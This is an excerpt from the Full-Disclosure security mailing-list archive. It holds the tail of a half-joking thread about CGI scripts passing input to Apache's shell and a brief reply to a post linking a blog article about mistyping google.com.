Thus, a user created CGI script can inject > and have executed any input into the shell that spawned apache. > > As a Debian user, this concerns me greatly, as any non-privileged user > would be able to install non-free documentation (GFDL) on any system I > run. > > Richard > > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] What happens to Your Computer if you MispellGoogle.com
I agree ;-) - Original Message - From: "pdp (architect)" <[EMAIL PROTECTED]> To: ; "Web Security" <[EMAIL PROTECTED]> Sent: Sunday, January 21, 2007 1:44 PM Subject: [Full-disclosure] What happens to Your Computer if you MispellGoogle.com > http://www.gnucitizen.org/blog/what-happens-to-your-computer-if-you-mispell-googlecom > > it is worth seeing this > > -- > pdp (architect) | petko d. petkov > http://www.gnucitizen.org > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
